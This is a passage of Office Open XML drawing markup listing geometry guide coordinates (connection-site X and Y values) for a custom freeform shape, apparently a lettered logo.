                <a:gd name="connsiteY80" fmla="*/ 432240 h 432780"/>
                <a:gd name="connsiteX81" fmla="*/ 455558 w 466529"/>
                <a:gd name="connsiteY81" fmla="*/ 416453 h 432780"/>
                <a:gd name="connsiteX82" fmla="*/ 450865 w 466529"/>
                <a:gd name="connsiteY82" fmla="*/ 410697 h 432780"/>
                <a:gd name="connsiteX83" fmla="*/ 446037 w 466529"/>
                <a:gd name="connsiteY83" fmla="*/ 416453 h 432780"/>
                <a:gd name="connsiteX84" fmla="*/ 446037 w 466529"/>
                <a:gd name="connsiteY84" fmla="*/ 432240 h 432780"/>
                <a:gd name="connsiteX85" fmla="*/ 438306 w 466529"/>
                <a:gd name="connsiteY85" fmla="*/ 432240 h 432780"/>
                <a:gd name="connsiteX86" fmla="*/ 438306 w 466529"/>
                <a:gd name="connsiteY86" fmla="*/ 403931 h 432780"/>
                <a:gd name="connsiteX87" fmla="*/ 446037 w 466529"/>
                <a:gd name="connsiteY87" fmla="*/ 403931 h 432780"/>
                <a:gd name="connsiteX88" fmla="*/ 446037 w 466529"/>
                <a:gd name="connsiteY88" fmla="*/ 407835 h 432780"/>
                <a:gd name="connsiteX89" fmla="*/ 454038 w 466529"/>
                <a:gd name="connsiteY89" fmla="*/ 403291 h 432780"/>
                <a:gd name="connsiteX90" fmla="*/ 48074 w 466529"/>
                <a:gd name="connsiteY90" fmla="*/ 403291 h 432780"/>
                <a:gd name="connsiteX91" fmla="*/ 61004 w 466529"/>
                <a:gd name="connsiteY91" fmla="*/ 418573 h 432780"/>
                <a:gd name="connsiteX92" fmla="*/ 61004 w 466529"/>
                <a:gd name="connsiteY92" fmla="*/ 420694 h 432780"/>
                <a:gd name="connsiteX93" fmla="*/ 42031 w 466529"/>
                <a:gd name="connsiteY93" fmla="*/ 420694 h 432780"/>
                <a:gd name="connsiteX94" fmla="*/ 48783 w 466529"/>
                <a:gd name="connsiteY94" fmla="*/ 426248 h 432780"/>
                <a:gd name="connsiteX95" fmla="*/ 55536 w 466529"/>
                <a:gd name="connsiteY95" fmla="*/ 423319 h 432780"/>
                <a:gd name="connsiteX96" fmla="*/ 59958 w 466529"/>
                <a:gd name="connsiteY96" fmla="*/ 427392 h 432780"/>
                <a:gd name="connsiteX97" fmla="*/ 48817 w 466529"/>
                <a:gd name="connsiteY97" fmla="*/ 432678 h 432780"/>
                <a:gd name="connsiteX98" fmla="*/ 47676 w 466529"/>
                <a:gd name="connsiteY98" fmla="*/ 432660 h 432780"/>
                <a:gd name="connsiteX99" fmla="*/ 34570 w 466529"/>
                <a:gd name="connsiteY99" fmla="*/ 418035 h 432780"/>
                <a:gd name="connsiteX100" fmla="*/ 34547 w 466529"/>
                <a:gd name="connsiteY100" fmla="*/ 417530 h 432780"/>
                <a:gd name="connsiteX101" fmla="*/ 48074 w 466529"/>
                <a:gd name="connsiteY101" fmla="*/ 403291 h 432780"/>
                <a:gd name="connsiteX102" fmla="*/ 7630 w 466529"/>
                <a:gd name="connsiteY102" fmla="*/ 402281 h 432780"/>
                <a:gd name="connsiteX103" fmla="*/ 7630 w 466529"/>
                <a:gd name="connsiteY103" fmla="*/ 410023 h 432780"/>
                <a:gd name="connsiteX104" fmla="*/ 14855 w 466529"/>
                <a:gd name="connsiteY104" fmla="*/ 410023 h 432780"/>
                <a:gd name="connsiteX105" fmla="*/ 20526 w 466529"/>
                <a:gd name="connsiteY105" fmla="*/ 406085 h 432780"/>
                <a:gd name="connsiteX106" fmla="*/ 15361 w 466529"/>
                <a:gd name="connsiteY106" fmla="*/ 402281 h 432780"/>
                <a:gd name="connsiteX107" fmla="*/ 369300 w 466529"/>
                <a:gd name="connsiteY107" fmla="*/ 396593 h 432780"/>
                <a:gd name="connsiteX108" fmla="*/ 377031 w 466529"/>
                <a:gd name="connsiteY108" fmla="*/ 396593 h 432780"/>
                <a:gd name="connsiteX109" fmla="*/ 377031 w 466529"/>
                <a:gd name="connsiteY109" fmla="*/ 403931 h 432780"/>
                <a:gd name="connsiteX110" fmla="*/ 383446 w 466529"/>
                <a:gd name="connsiteY110" fmla="*/ 403931 h 432780"/>
                <a:gd name="connsiteX111" fmla="*/ 383446 w 466529"/>
                <a:gd name="connsiteY111" fmla="*/ 410663 h 432780"/>
                <a:gd name="connsiteX112" fmla="*/ 377031 w 466529"/>
                <a:gd name="connsiteY112" fmla="*/ 410663 h 432780"/>
                <a:gd name="connsiteX113" fmla="*/ 377031 w 466529"/>
                <a:gd name="connsiteY113" fmla="*/ 422781 h 432780"/>
                <a:gd name="connsiteX114" fmla="*/ 379529 w 466529"/>
                <a:gd name="connsiteY114" fmla="*/ 425542 h 432780"/>
                <a:gd name="connsiteX115" fmla="*/ 383345 w 466529"/>
                <a:gd name="connsiteY115" fmla="*/ 424532 h 432780"/>
                <a:gd name="connsiteX116" fmla="*/ 383345 w 466529"/>
                <a:gd name="connsiteY116" fmla="*/ 430995 h 432780"/>
                <a:gd name="connsiteX117" fmla="*/ 377268 w 466529"/>
                <a:gd name="connsiteY117" fmla="*/ 432610 h 432780"/>
                <a:gd name="connsiteX118" fmla="*/ 369300 w 466529"/>
                <a:gd name="connsiteY118" fmla="*/ 424128 h 432780"/>
                <a:gd name="connsiteX119" fmla="*/ 369300 w 466529"/>
                <a:gd name="connsiteY119" fmla="*/ 410663 h 432780"/>
                <a:gd name="connsiteX120" fmla="*/ 365924 w 466529"/>
                <a:gd name="connsiteY120" fmla="*/ 410663 h 432780"/>
                <a:gd name="connsiteX121" fmla="*/ 365924 w 466529"/>
                <a:gd name="connsiteY121" fmla="*/ 403931 h 432780"/>
                <a:gd name="connsiteX122" fmla="*/ 369300 w 466529"/>
                <a:gd name="connsiteY122" fmla="*/ 403931 h 432780"/>
                <a:gd name="connsiteX123" fmla="*/ 93414 w 466529"/>
                <a:gd name="connsiteY123" fmla="*/ 396593 h 432780"/>
                <a:gd name="connsiteX124" fmla="*/ 101280 w 466529"/>
                <a:gd name="connsiteY124" fmla="*/ 396593 h 432780"/>
                <a:gd name="connsiteX125" fmla="*/ 101280 w 466529"/>
                <a:gd name="connsiteY125" fmla="*/ 403931 h 432780"/>
                <a:gd name="connsiteX126" fmla="*/ 107560 w 466529"/>
                <a:gd name="connsiteY126" fmla="*/ 403931 h 432780"/>
                <a:gd name="connsiteX127" fmla="*/ 107560 w 466529"/>
                <a:gd name="connsiteY127" fmla="*/ 410663 h 432780"/>
                <a:gd name="connsiteX128" fmla="*/ 101145 w 466529"/>
                <a:gd name="connsiteY128" fmla="*/ 410663 h 432780"/>
                <a:gd name="connsiteX129" fmla="*/ 101145 w 466529"/>
                <a:gd name="connsiteY129" fmla="*/ 422781 h 432780"/>
                <a:gd name="connsiteX130" fmla="*/ 103643 w 466529"/>
                <a:gd name="connsiteY130" fmla="*/ 425542 h 432780"/>
                <a:gd name="connsiteX131" fmla="*/ 107459 w 466529"/>
                <a:gd name="connsiteY131" fmla="*/ 424532 h 432780"/>
                <a:gd name="connsiteX132" fmla="*/ 107459 w 466529"/>
                <a:gd name="connsiteY132" fmla="*/ 430995 h 432780"/>
                <a:gd name="connsiteX133" fmla="*/ 101348 w 466529"/>
                <a:gd name="connsiteY133" fmla="*/ 432610 h 432780"/>
                <a:gd name="connsiteX134" fmla="*/ 93414 w 466529"/>
                <a:gd name="connsiteY134" fmla="*/ 424128 h 432780"/>
                <a:gd name="connsiteX135" fmla="*/ 93414 w 466529"/>
                <a:gd name="connsiteY135" fmla="*/ 410663 h 432780"/>
                <a:gd name="connsiteX136" fmla="*/ 90038 w 466529"/>
                <a:gd name="connsiteY136" fmla="*/ 410663 h 432780"/>
                <a:gd name="connsiteX137" fmla="*/ 90038 w 466529"/>
                <a:gd name="connsiteY137" fmla="*/ 403931 h 432780"/>
                <a:gd name="connsiteX138" fmla="*/ 93414 w 466529"/>
                <a:gd name="connsiteY138" fmla="*/ 403931 h 432780"/>
                <a:gd name="connsiteX139" fmla="*/ 0 w 466529"/>
                <a:gd name="connsiteY139" fmla="*/ 395179 h 432780"/>
                <a:gd name="connsiteX140" fmla="*/ 16543 w 466529"/>
                <a:gd name="connsiteY140" fmla="*/ 395179 h 432780"/>
                <a:gd name="connsiteX141" fmla="*/ 25860 w 466529"/>
                <a:gd name="connsiteY141" fmla="*/ 398545 h 432780"/>
                <a:gd name="connsiteX142" fmla="*/ 28291 w 466529"/>
                <a:gd name="connsiteY142" fmla="*/ 404840 h 432780"/>
                <a:gd name="connsiteX143" fmla="*/ 23632 w 466529"/>
                <a:gd name="connsiteY143" fmla="*/ 412818 h 432780"/>
                <a:gd name="connsiteX144" fmla="*/ 30384 w 466529"/>
                <a:gd name="connsiteY144" fmla="*/ 422108 h 432780"/>
                <a:gd name="connsiteX145" fmla="*/ 16880 w 466529"/>
                <a:gd name="connsiteY145" fmla="*/ 432206 h 432780"/>
                <a:gd name="connsiteX146" fmla="*/ 0 w 466529"/>
                <a:gd name="connsiteY146" fmla="*/ 432206 h 432780"/>
                <a:gd name="connsiteX147" fmla="*/ 206071 w 466529"/>
                <a:gd name="connsiteY147" fmla="*/ 395145 h 432780"/>
                <a:gd name="connsiteX148" fmla="*/ 232944 w 466529"/>
                <a:gd name="connsiteY148" fmla="*/ 395145 h 432780"/>
                <a:gd name="connsiteX149" fmla="*/ 232944 w 466529"/>
                <a:gd name="connsiteY149" fmla="*/ 402416 h 432780"/>
                <a:gd name="connsiteX150" fmla="*/ 213869 w 466529"/>
                <a:gd name="connsiteY150" fmla="*/ 402416 h 432780"/>
                <a:gd name="connsiteX151" fmla="*/ 213869 w 466529"/>
                <a:gd name="connsiteY151" fmla="*/ 409889 h 432780"/>
                <a:gd name="connsiteX152" fmla="*/ 230649 w 466529"/>
                <a:gd name="connsiteY152" fmla="*/ 409889 h 432780"/>
                <a:gd name="connsiteX153" fmla="*/ 230649 w 466529"/>
                <a:gd name="connsiteY153" fmla="*/ 417126 h 432780"/>
                <a:gd name="connsiteX154" fmla="*/ 213869 w 466529"/>
                <a:gd name="connsiteY154" fmla="*/ 417126 h 432780"/>
                <a:gd name="connsiteX155" fmla="*/ 213869 w 466529"/>
                <a:gd name="connsiteY155" fmla="*/ 424901 h 432780"/>
                <a:gd name="connsiteX156" fmla="*/ 233214 w 466529"/>
                <a:gd name="connsiteY156" fmla="*/ 424901 h 432780"/>
                <a:gd name="connsiteX157" fmla="*/ 233214 w 466529"/>
                <a:gd name="connsiteY157" fmla="*/ 432139 h 432780"/>
                <a:gd name="connsiteX158" fmla="*/ 206071 w 466529"/>
                <a:gd name="connsiteY158" fmla="*/ 432139 h 432780"/>
                <a:gd name="connsiteX159" fmla="*/ 161913 w 466529"/>
                <a:gd name="connsiteY159" fmla="*/ 395145 h 432780"/>
                <a:gd name="connsiteX160" fmla="*/ 170353 w 466529"/>
                <a:gd name="connsiteY160" fmla="*/ 395145 h 432780"/>
                <a:gd name="connsiteX161" fmla="*/ 179738 w 466529"/>
                <a:gd name="connsiteY161" fmla="*/ 410798 h 432780"/>
                <a:gd name="connsiteX162" fmla="*/ 189090 w 466529"/>
                <a:gd name="connsiteY162" fmla="*/ 395145 h 432780"/>
                <a:gd name="connsiteX163" fmla="*/ 197530 w 466529"/>
                <a:gd name="connsiteY163" fmla="*/ 395145 h 432780"/>
                <a:gd name="connsiteX164" fmla="*/ 197530 w 466529"/>
                <a:gd name="connsiteY164" fmla="*/ 432139 h 432780"/>
                <a:gd name="connsiteX165" fmla="*/ 189765 w 466529"/>
                <a:gd name="connsiteY165" fmla="*/ 432139 h 432780"/>
                <a:gd name="connsiteX166" fmla="*/ 189765 w 466529"/>
                <a:gd name="connsiteY166" fmla="*/ 408003 h 432780"/>
                <a:gd name="connsiteX167" fmla="*/ 179738 w 466529"/>
                <a:gd name="connsiteY167" fmla="*/ 423791 h 432780"/>
                <a:gd name="connsiteX168" fmla="*/ 179536 w 466529"/>
                <a:gd name="connsiteY168" fmla="*/ 423791 h 432780"/>
                <a:gd name="connsiteX169" fmla="*/ 169610 w 466529"/>
                <a:gd name="connsiteY169" fmla="*/ 408172 h 432780"/>
                <a:gd name="connsiteX170" fmla="*/ 169610 w 466529"/>
                <a:gd name="connsiteY170" fmla="*/ 432139 h 432780"/>
                <a:gd name="connsiteX171" fmla="*/ 161913 w 466529"/>
                <a:gd name="connsiteY171" fmla="*/ 432139 h 432780"/>
                <a:gd name="connsiteX172" fmla="*/ 266873 w 466529"/>
                <a:gd name="connsiteY172" fmla="*/ 394607 h 432780"/>
                <a:gd name="connsiteX173" fmla="*/ 280107 w 466529"/>
                <a:gd name="connsiteY173" fmla="*/ 399286 h 432780"/>
                <a:gd name="connsiteX174" fmla="*/ 276055 w 466529"/>
                <a:gd name="connsiteY174" fmla="*/ 405446 h 432780"/>
                <a:gd name="connsiteX175" fmla="*/ 266771 w 466529"/>
                <a:gd name="connsiteY175" fmla="*/ 401777 h 432780"/>
                <a:gd name="connsiteX176" fmla="*/ 262214 w 466529"/>
                <a:gd name="connsiteY176" fmla="*/ 405143 h 432780"/>
                <a:gd name="connsiteX177" fmla="*/ 269877 w 466529"/>
                <a:gd name="connsiteY177" fmla="*/ 409990 h 432780"/>
                <a:gd name="connsiteX178" fmla="*/ 281187 w 466529"/>
                <a:gd name="connsiteY178" fmla="*/ 420862 h 432780"/>
                <a:gd name="connsiteX179" fmla="*/ 268122 w 466529"/>
                <a:gd name="connsiteY179" fmla="*/ 432341 h 432780"/>
                <a:gd name="connsiteX180" fmla="*/ 252997 w 466529"/>
                <a:gd name="connsiteY180" fmla="*/ 426416 h 432780"/>
                <a:gd name="connsiteX181" fmla="*/ 257622 w 466529"/>
                <a:gd name="connsiteY181" fmla="*/ 420661 h 432780"/>
                <a:gd name="connsiteX182" fmla="*/ 268257 w 466529"/>
                <a:gd name="connsiteY182" fmla="*/ 425137 h 432780"/>
                <a:gd name="connsiteX183" fmla="*/ 273388 w 466529"/>
                <a:gd name="connsiteY183" fmla="*/ 421771 h 432780"/>
                <a:gd name="connsiteX184" fmla="*/ 266231 w 466529"/>
                <a:gd name="connsiteY184" fmla="*/ 417059 h 432780"/>
                <a:gd name="connsiteX185" fmla="*/ 254415 w 466529"/>
                <a:gd name="connsiteY185" fmla="*/ 405749 h 432780"/>
                <a:gd name="connsiteX186" fmla="*/ 266873 w 466529"/>
                <a:gd name="connsiteY186" fmla="*/ 394607 h 432780"/>
                <a:gd name="connsiteX187" fmla="*/ 140813 w 466529"/>
                <a:gd name="connsiteY187" fmla="*/ 394607 h 432780"/>
                <a:gd name="connsiteX188" fmla="*/ 154047 w 466529"/>
                <a:gd name="connsiteY188" fmla="*/ 399286 h 432780"/>
                <a:gd name="connsiteX189" fmla="*/ 149962 w 466529"/>
                <a:gd name="connsiteY189" fmla="*/ 405446 h 432780"/>
                <a:gd name="connsiteX190" fmla="*/ 140712 w 466529"/>
                <a:gd name="connsiteY190" fmla="*/ 401777 h 432780"/>
                <a:gd name="connsiteX191" fmla="*/ 136120 w 466529"/>
                <a:gd name="connsiteY191" fmla="*/ 405143 h 432780"/>
                <a:gd name="connsiteX192" fmla="*/ 143818 w 466529"/>
                <a:gd name="connsiteY192" fmla="*/ 409990 h 432780"/>
                <a:gd name="connsiteX193" fmla="*/ 155229 w 466529"/>
                <a:gd name="connsiteY193" fmla="*/ 421199 h 432780"/>
                <a:gd name="connsiteX194" fmla="*/ 142164 w 466529"/>
                <a:gd name="connsiteY194" fmla="*/ 432677 h 432780"/>
                <a:gd name="connsiteX195" fmla="*/ 127039 w 466529"/>
                <a:gd name="connsiteY195" fmla="*/ 426753 h 432780"/>
                <a:gd name="connsiteX196" fmla="*/ 131664 w 466529"/>
                <a:gd name="connsiteY196" fmla="*/ 420997 h 432780"/>
                <a:gd name="connsiteX197" fmla="*/ 142164 w 466529"/>
                <a:gd name="connsiteY197" fmla="*/ 425137 h 432780"/>
                <a:gd name="connsiteX198" fmla="*/ 147329 w 466529"/>
                <a:gd name="connsiteY198" fmla="*/ 421771 h 432780"/>
                <a:gd name="connsiteX199" fmla="*/ 140138 w 466529"/>
                <a:gd name="connsiteY199" fmla="*/ 417059 h 432780"/>
                <a:gd name="connsiteX200" fmla="*/ 128322 w 466529"/>
                <a:gd name="connsiteY200" fmla="*/ 405749 h 432780"/>
                <a:gd name="connsiteX201" fmla="*/ 140813 w 466529"/>
                <a:gd name="connsiteY201" fmla="*/ 394607 h 432780"/>
                <a:gd name="connsiteX202" fmla="*/ 389320 w 466529"/>
                <a:gd name="connsiteY202" fmla="*/ 393563 h 432780"/>
                <a:gd name="connsiteX203" fmla="*/ 397457 w 466529"/>
                <a:gd name="connsiteY203" fmla="*/ 393563 h 432780"/>
                <a:gd name="connsiteX204" fmla="*/ 397457 w 466529"/>
                <a:gd name="connsiteY204" fmla="*/ 400699 h 432780"/>
                <a:gd name="connsiteX205" fmla="*/ 389320 w 466529"/>
                <a:gd name="connsiteY205" fmla="*/ 400699 h 432780"/>
                <a:gd name="connsiteX206" fmla="*/ 321327 w 466529"/>
                <a:gd name="connsiteY206" fmla="*/ 393563 h 432780"/>
                <a:gd name="connsiteX207" fmla="*/ 329059 w 466529"/>
                <a:gd name="connsiteY207" fmla="*/ 393563 h 432780"/>
                <a:gd name="connsiteX208" fmla="*/ 329059 w 466529"/>
                <a:gd name="connsiteY208" fmla="*/ 432139 h 432780"/>
                <a:gd name="connsiteX209" fmla="*/ 321327 w 466529"/>
                <a:gd name="connsiteY209" fmla="*/ 432139 h 432780"/>
                <a:gd name="connsiteX210" fmla="*/ 223423 w 466529"/>
                <a:gd name="connsiteY210" fmla="*/ 335565 h 432780"/>
                <a:gd name="connsiteX211" fmla="*/ 231391 w 466529"/>
                <a:gd name="connsiteY211" fmla="*/ 355056 h 432780"/>
                <a:gd name="connsiteX212" fmla="*/ 215456 w 466529"/>
                <a:gd name="connsiteY212" fmla="*/ 355056 h 432780"/>
                <a:gd name="connsiteX213" fmla="*/ 106040 w 466529"/>
                <a:gd name="connsiteY213" fmla="*/ 335565 h 432780"/>
                <a:gd name="connsiteX214" fmla="*/ 113974 w 466529"/>
                <a:gd name="connsiteY214" fmla="*/ 355056 h 432780"/>
                <a:gd name="connsiteX215" fmla="*/ 98073 w 466529"/>
                <a:gd name="connsiteY215" fmla="*/ 355056 h 432780"/>
                <a:gd name="connsiteX216" fmla="*/ 159752 w 466529"/>
                <a:gd name="connsiteY216" fmla="*/ 328497 h 432780"/>
                <a:gd name="connsiteX217" fmla="*/ 148206 w 466529"/>
                <a:gd name="connsiteY217" fmla="*/ 347515 h 432780"/>
                <a:gd name="connsiteX218" fmla="*/ 163567 w 466529"/>
                <a:gd name="connsiteY218" fmla="*/ 366635 h 432780"/>
                <a:gd name="connsiteX219" fmla="*/ 178624 w 466529"/>
                <a:gd name="connsiteY219" fmla="*/ 360643 h 432780"/>
                <a:gd name="connsiteX220" fmla="*/ 178928 w 466529"/>
                <a:gd name="connsiteY220" fmla="*/ 360172 h 432780"/>
                <a:gd name="connsiteX221" fmla="*/ 178928 w 466529"/>
                <a:gd name="connsiteY221" fmla="*/ 348727 h 432780"/>
                <a:gd name="connsiteX222" fmla="*/ 165424 w 466529"/>
                <a:gd name="connsiteY222" fmla="*/ 348727 h 432780"/>
                <a:gd name="connsiteX223" fmla="*/ 165424 w 466529"/>
                <a:gd name="connsiteY223" fmla="*/ 352665 h 432780"/>
                <a:gd name="connsiteX224" fmla="*/ 174809 w 466529"/>
                <a:gd name="connsiteY224" fmla="*/ 352665 h 432780"/>
                <a:gd name="connsiteX225" fmla="*/ 174809 w 466529"/>
                <a:gd name="connsiteY225" fmla="*/ 358926 h 432780"/>
                <a:gd name="connsiteX226" fmla="*/ 163398 w 466529"/>
                <a:gd name="connsiteY226" fmla="*/ 362696 h 432780"/>
                <a:gd name="connsiteX227" fmla="*/ 151920 w 466529"/>
                <a:gd name="connsiteY227" fmla="*/ 347515 h 432780"/>
                <a:gd name="connsiteX228" fmla="*/ 161001 w 466529"/>
                <a:gd name="connsiteY228" fmla="*/ 332233 h 432780"/>
                <a:gd name="connsiteX229" fmla="*/ 175451 w 466529"/>
                <a:gd name="connsiteY229" fmla="*/ 336710 h 432780"/>
                <a:gd name="connsiteX230" fmla="*/ 176700 w 466529"/>
                <a:gd name="connsiteY230" fmla="*/ 338225 h 432780"/>
                <a:gd name="connsiteX231" fmla="*/ 179738 w 466529"/>
                <a:gd name="connsiteY231" fmla="*/ 335667 h 432780"/>
                <a:gd name="connsiteX232" fmla="*/ 178455 w 466529"/>
                <a:gd name="connsiteY232" fmla="*/ 334185 h 432780"/>
                <a:gd name="connsiteX233" fmla="*/ 159752 w 466529"/>
                <a:gd name="connsiteY233" fmla="*/ 328497 h 432780"/>
                <a:gd name="connsiteX234" fmla="*/ 420852 w 466529"/>
                <a:gd name="connsiteY234" fmla="*/ 328396 h 432780"/>
                <a:gd name="connsiteX235" fmla="*/ 420852 w 466529"/>
                <a:gd name="connsiteY235" fmla="*/ 366635 h 432780"/>
                <a:gd name="connsiteX236" fmla="*/ 445193 w 466529"/>
                <a:gd name="connsiteY236" fmla="*/ 366635 h 432780"/>
                <a:gd name="connsiteX237" fmla="*/ 445193 w 466529"/>
                <a:gd name="connsiteY237" fmla="*/ 362696 h 432780"/>
                <a:gd name="connsiteX238" fmla="*/ 424937 w 466529"/>
                <a:gd name="connsiteY238" fmla="*/ 362696 h 432780"/>
                <a:gd name="connsiteX239" fmla="*/ 424937 w 466529"/>
                <a:gd name="connsiteY239" fmla="*/ 352026 h 432780"/>
                <a:gd name="connsiteX240" fmla="*/ 440872 w 466529"/>
                <a:gd name="connsiteY240" fmla="*/ 352026 h 432780"/>
                <a:gd name="connsiteX241" fmla="*/ 440872 w 466529"/>
                <a:gd name="connsiteY241" fmla="*/ 348088 h 432780"/>
                <a:gd name="connsiteX242" fmla="*/ 424937 w 466529"/>
                <a:gd name="connsiteY242" fmla="*/ 348088 h 432780"/>
                <a:gd name="connsiteX243" fmla="*/ 424937 w 466529"/>
                <a:gd name="connsiteY243" fmla="*/ 332334 h 432780"/>
                <a:gd name="connsiteX244" fmla="*/ 445193 w 466529"/>
                <a:gd name="connsiteY244" fmla="*/ 332334 h 432780"/>
                <a:gd name="connsiteX245" fmla="*/ 445193 w 466529"/>
                <a:gd name="connsiteY245" fmla="*/ 328396 h 432780"/>
                <a:gd name="connsiteX246" fmla="*/ 323319 w 466529"/>
                <a:gd name="connsiteY246" fmla="*/ 328396 h 432780"/>
                <a:gd name="connsiteX247" fmla="*/ 323319 w 466529"/>
                <a:gd name="connsiteY247" fmla="*/ 366635 h 432780"/>
                <a:gd name="connsiteX248" fmla="*/ 327270 w 466529"/>
                <a:gd name="connsiteY248" fmla="*/ 366635 h 432780"/>
                <a:gd name="connsiteX249" fmla="*/ 327270 w 466529"/>
                <a:gd name="connsiteY249" fmla="*/ 328396 h 432780"/>
                <a:gd name="connsiteX250" fmla="*/ 267244 w 466529"/>
                <a:gd name="connsiteY250" fmla="*/ 328396 h 432780"/>
                <a:gd name="connsiteX251" fmla="*/ 267244 w 466529"/>
                <a:gd name="connsiteY251" fmla="*/ 332334 h 432780"/>
                <a:gd name="connsiteX252" fmla="*/ 285576 w 466529"/>
                <a:gd name="connsiteY252" fmla="*/ 332334 h 432780"/>
                <a:gd name="connsiteX253" fmla="*/ 265793 w 466529"/>
                <a:gd name="connsiteY253" fmla="*/ 366635 h 432780"/>
                <a:gd name="connsiteX254" fmla="*/ 290944 w 466529"/>
                <a:gd name="connsiteY254" fmla="*/ 366635 h 432780"/>
                <a:gd name="connsiteX255" fmla="*/ 290944 w 466529"/>
                <a:gd name="connsiteY255" fmla="*/ 362696 h 432780"/>
                <a:gd name="connsiteX256" fmla="*/ 272612 w 466529"/>
                <a:gd name="connsiteY256" fmla="*/ 362696 h 432780"/>
                <a:gd name="connsiteX257" fmla="*/ 292362 w 466529"/>
                <a:gd name="connsiteY257" fmla="*/ 328396 h 432780"/>
                <a:gd name="connsiteX258" fmla="*/ 359038 w 466529"/>
                <a:gd name="connsiteY258" fmla="*/ 326915 h 432780"/>
                <a:gd name="connsiteX259" fmla="*/ 359038 w 466529"/>
                <a:gd name="connsiteY259" fmla="*/ 366635 h 432780"/>
                <a:gd name="connsiteX260" fmla="*/ 362988 w 466529"/>
                <a:gd name="connsiteY260" fmla="*/ 366635 h 432780"/>
                <a:gd name="connsiteX261" fmla="*/ 362988 w 466529"/>
                <a:gd name="connsiteY261" fmla="*/ 337585 h 432780"/>
                <a:gd name="connsiteX262" fmla="*/ 388476 w 466529"/>
                <a:gd name="connsiteY262" fmla="*/ 367375 h 432780"/>
                <a:gd name="connsiteX263" fmla="*/ 388476 w 466529"/>
                <a:gd name="connsiteY263" fmla="*/ 327655 h 432780"/>
                <a:gd name="connsiteX264" fmla="*/ 384527 w 466529"/>
                <a:gd name="connsiteY264" fmla="*/ 327655 h 432780"/>
                <a:gd name="connsiteX265" fmla="*/ 384527 w 466529"/>
                <a:gd name="connsiteY265" fmla="*/ 356805 h 432780"/>
                <a:gd name="connsiteX266" fmla="*/ 223424 w 466529"/>
                <a:gd name="connsiteY266" fmla="*/ 325131 h 432780"/>
                <a:gd name="connsiteX267" fmla="*/ 206847 w 466529"/>
                <a:gd name="connsiteY267" fmla="*/ 365759 h 432780"/>
                <a:gd name="connsiteX268" fmla="*/ 211067 w 466529"/>
                <a:gd name="connsiteY268" fmla="*/ 365759 h 432780"/>
                <a:gd name="connsiteX269" fmla="*/ 213870 w 466529"/>
                <a:gd name="connsiteY269" fmla="*/ 359027 h 432780"/>
                <a:gd name="connsiteX270" fmla="*/ 233012 w 466529"/>
                <a:gd name="connsiteY270" fmla="*/ 359027 h 432780"/>
                <a:gd name="connsiteX271" fmla="*/ 235746 w 466529"/>
                <a:gd name="connsiteY271" fmla="*/ 365759 h 432780"/>
                <a:gd name="connsiteX272" fmla="*/ 240034 w 466529"/>
                <a:gd name="connsiteY272" fmla="*/ 365759 h 432780"/>
                <a:gd name="connsiteX273" fmla="*/ 106006 w 466529"/>
                <a:gd name="connsiteY273" fmla="*/ 325131 h 432780"/>
                <a:gd name="connsiteX274" fmla="*/ 89430 w 466529"/>
                <a:gd name="connsiteY274" fmla="*/ 365759 h 432780"/>
                <a:gd name="connsiteX275" fmla="*/ 93650 w 466529"/>
                <a:gd name="connsiteY275" fmla="*/ 365759 h 432780"/>
                <a:gd name="connsiteX276" fmla="*/ 96452 w 466529"/>
                <a:gd name="connsiteY276" fmla="*/ 359027 h 432780"/>
                <a:gd name="connsiteX277" fmla="*/ 115594 w 466529"/>
                <a:gd name="connsiteY277" fmla="*/ 359027 h 432780"/>
                <a:gd name="connsiteX278" fmla="*/ 118329 w 466529"/>
                <a:gd name="connsiteY278" fmla="*/ 365759 h 432780"/>
                <a:gd name="connsiteX279" fmla="*/ 122616 w 466529"/>
                <a:gd name="connsiteY279" fmla="*/ 365759 h 432780"/>
                <a:gd name="connsiteX280" fmla="*/ 25016 w 466529"/>
                <a:gd name="connsiteY280" fmla="*/ 324458 h 432780"/>
                <a:gd name="connsiteX281" fmla="*/ 25016 w 466529"/>
                <a:gd name="connsiteY281" fmla="*/ 366567 h 432780"/>
                <a:gd name="connsiteX282" fmla="*/ 28966 w 466529"/>
                <a:gd name="connsiteY282" fmla="*/ 366567 h 432780"/>
                <a:gd name="connsiteX283" fmla="*/ 28966 w 466529"/>
                <a:gd name="connsiteY283" fmla="*/ 336272 h 432780"/>
                <a:gd name="connsiteX284" fmla="*/ 42268 w 466529"/>
                <a:gd name="connsiteY284" fmla="*/ 354045 h 432780"/>
                <a:gd name="connsiteX285" fmla="*/ 55603 w 466529"/>
                <a:gd name="connsiteY285" fmla="*/ 336340 h 432780"/>
                <a:gd name="connsiteX286" fmla="*/ 55603 w 466529"/>
                <a:gd name="connsiteY286" fmla="*/ 366635 h 432780"/>
                <a:gd name="connsiteX287" fmla="*/ 59552 w 466529"/>
                <a:gd name="connsiteY287" fmla="*/ 366635 h 432780"/>
                <a:gd name="connsiteX288" fmla="*/ 59552 w 466529"/>
                <a:gd name="connsiteY288" fmla="*/ 324458 h 432780"/>
                <a:gd name="connsiteX289" fmla="*/ 42268 w 466529"/>
                <a:gd name="connsiteY289" fmla="*/ 347414 h 432780"/>
                <a:gd name="connsiteX290" fmla="*/ 0 w 466529"/>
                <a:gd name="connsiteY290" fmla="*/ 110037 h 432780"/>
                <a:gd name="connsiteX291" fmla="*/ 72584 w 466529"/>
                <a:gd name="connsiteY291" fmla="*/ 172949 h 432780"/>
                <a:gd name="connsiteX292" fmla="*/ 150232 w 466529"/>
                <a:gd name="connsiteY292" fmla="*/ 225729 h 432780"/>
                <a:gd name="connsiteX293" fmla="*/ 105669 w 466529"/>
                <a:gd name="connsiteY293" fmla="*/ 258583 h 432780"/>
                <a:gd name="connsiteX294" fmla="*/ 56582 w 466529"/>
                <a:gd name="connsiteY294" fmla="*/ 206442 h 432780"/>
                <a:gd name="connsiteX295" fmla="*/ 0 w 466529"/>
                <a:gd name="connsiteY295" fmla="*/ 206442 h 432780"/>
                <a:gd name="connsiteX296" fmla="*/ 362009 w 466529"/>
                <a:gd name="connsiteY296" fmla="*/ 54463 h 432780"/>
                <a:gd name="connsiteX297" fmla="*/ 408496 w 466529"/>
                <a:gd name="connsiteY297" fmla="*/ 86003 h 432780"/>
                <a:gd name="connsiteX298" fmla="*/ 407889 w 466529"/>
                <a:gd name="connsiteY298" fmla="*/ 113706 h 432780"/>
                <a:gd name="connsiteX299" fmla="*/ 466496 w 466529"/>
                <a:gd name="connsiteY299" fmla="*/ 113706 h 432780"/>
                <a:gd name="connsiteX300" fmla="*/ 466496 w 466529"/>
                <a:gd name="connsiteY300" fmla="*/ 198060 h 432780"/>
